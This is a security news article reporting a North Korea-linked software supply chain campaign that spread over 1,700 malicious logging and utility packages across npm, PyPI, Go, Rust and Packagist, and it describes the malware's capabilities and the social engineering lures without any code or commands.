A large-scale software supply chain attack linked to North Korean threat actors has been uncovered, involving the of more than 1,700 malicious packages across multiple developer ecosystems, including npm, PyPI, Go, Rust, and Packagist.
The campaign, tracked as Contagious Interview, demonstrates a coordinated effort to infiltrate developer environments by disguising malware as legitimate development tools.
Security researchers from Socket revealed that these packages were crafted to mimic commonly used logging and utility libraries while secretly functioning as malware delivery mechanisms.
Multi-Ecosystem Supply Chain Compromise
The malicious packages were distributed across several popular programming ecosystems:
- npm packages such as dev-log-core and logger-base
- PyPI libraries including logutilkit and fluxhttp
- Go repositories hosted on GitHub
- Rust package logtrace
- Packagist package golangorg/logkit
This cross-platform approach significantly increases the attack surface, enabling threat actors to target developers working in different programming environments.
Hidden Malware Loaders and Stealth Execution
The primary purpose of these packages is to act as loaders that download second-stage malware tailored to the victim’s operating system.
Unlike typical malicious packages, the embedded code does not execute immediately upon installation. Instead, it is hidden within functions that appear legitimate and relevant to the package’s purpose.
For example, in the Rust package “logtrace,” malicious code is concealed within a logging function, making it difficult for developers to detect.
Advanced Data Theft and Remote Access Capabilities
Once activated, the malware delivers powerful capabilities, including:
- Extraction of browser data and saved credentials
- Access to password managers
- Theft of cryptocurrency wallet information
- Remote command execution
A Windows-specific variant delivered through “license-utils-kit” goes further by deploying a full-featured post-compromise implant capable of:
- Logging keystrokes
- Executing system commands
- Uploading and downloading files
- Terminating browser processes
- Installing AnyDesk for persistent remote access
- Creating encrypted archives
These features indicate a high level of sophistication and intent to maintain long-term access.
Growing Scale and Persistence of the Campaign
Since early 2025, researchers have identified over 1,700 malicious packages associated with this campaign, highlighting its scale and persistence.
The operation reflects a well-funded and strategically executed effort aimed at compromising software supply chains to gain initial access into developer systems for both espionage and financial theft.
Connection to Broader North Korean Cyber Operations
This activity is part of a wider pattern of cyber campaigns attributed to North Korean threat actors. One notable incident involved the compromise of the widely used Axios npm package, which was used to distribute malware after attackers gained control of the maintainer’s account through social engineering.
The campaign has been linked to a financially motivated threat group known as UNC1069, which overlaps with other known groups such as BlueNoroff, Sapphire Sleet, and Stardust Chollima.
Social Engineering and Fake Meeting Lures
Researchers from Security Alliance reported that attackers used sophisticated social engineering tactics to lure victims.
The group impersonates trusted contacts or well-known platforms like Microsoft Teams and Zoom, sending fake meeting invitations via channels such as Telegram, LinkedIn, and Slack.
These links lead to malicious pages that trigger malware execution, often using techniques similar to ClickFix-style attacks.
Delayed Execution Strategy for Maximum Impact
One notable tactic used by the attackers is delaying malicious activity after initial compromise. Victims often continue normal operations, unaware that their systems have already been breached.
This delay allows attackers to gather intelligence and maximize the effectiveness of their operations before detection.
Evolving Threat Landscape
Experts from Microsoft Threat Intelligence warn that North Korean cyber actors are continuously adapting their tools, infrastructure, and attack strategies.
They frequently use domains that mimic legitimate services, including financial institutions and video conferencing platforms, to enhance the credibility of their attacks.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
